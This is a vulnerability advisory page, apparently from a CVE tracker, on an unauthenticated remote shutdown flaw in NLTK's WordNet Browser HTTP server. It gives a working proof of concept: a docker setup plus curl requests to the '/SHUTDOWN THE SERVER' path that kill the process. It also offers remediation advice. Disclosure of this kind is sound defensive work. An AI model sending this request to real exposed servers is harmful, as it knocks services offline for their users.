CVE-2026-33231
HIGH
GHSA-jm6w-m3j8-898g
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2Description
### Summary `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. ### Details The vulnerable logic is in `nltk/app/wordnet_app.py`: - [`nltk/app/wordnet_app.py:242`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L242) - The server listens on all interfaces: - `server = HTTPServer(("", port), MyServerHandler)` - [`nltk/app/wordnet_app.py:87`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L87) - Incoming requests are checked for the exact path: - `if unquote_plus(sp) == "SHUTDOWN THE SERVER":` - [`nltk/app/wordnet_app.py:88`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L88) - The shutdown protection only depends on `server_mode` - [`nltk/app/wordnet_app.py:93`](/mnt/Data/my_brains/test/nltk/nltk/app/wordnet_app.py#L93) - In the default mode (`runBrowser=True`, therefore `server_mode=False`), the handler terminates the process directly: - `os._exit(0)` This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode. ### PoC 1. Start the WordNet Browser in Docker in its default mode: ```bash docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \ nltk-sandbox \ python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)" ``` 2. Confirm the service is reachable: ```bash curl -s -o /tmp/wn_before.html -w '%{http_code}\n' 'http://127.0.0.1:8004/' ``` Observed result: ```text 200 ``` 3. Trigger shutdown: ```bash curl -s -o /tmp/wn_shutdown.html -w '%{http_code}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER' ``` Observed result: ```text 000 ``` 4. Verify the service is no longer available: ```bash curl -s -o /tmp/wn_after.html -w '%{http_code}\n' 'http://127.0.0.1:8004/' docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}' docker logs nltk-wordnet-web-default-retest ``` Observed results: ```text 000 nltk-wordnet-web-default-retest Exited (0) Server shutting down! ``` ### Impact This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server. Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because: - the route is accessible over HTTP - no authentication or CSRF-style confirmation is required - the server listens on all interfaces by default - the process exits immediately instead of performing a controlled shutdown This primarily affects users who run `nltk.app.wordnet_app` and expose or otherwise allow access to its listening port.
Analysis
The NLTK (Natural Language Toolkit) WordNet Browser HTTP server contains an unauthenticated shutdown vulnerability that allows any remote attacker to terminate the service with a single GET request to the '/SHUTDOWN THE SERVER' endpoint. This affects users running nltk.app.wordnet_app in its default mode, where the server binds to all network interfaces without authentication. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Identify all systems running nltk.app.wordnet_app and assess business criticality; disable or isolate the service if not essential. Within 7 days: Implement network segmentation to restrict access to the WordNet endpoint or deploy WAF rules blocking requests to '/SHUTDOWN THE SERVER'; monitor vendor communications for patch release. …
Sign in for detailed remediation steps.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today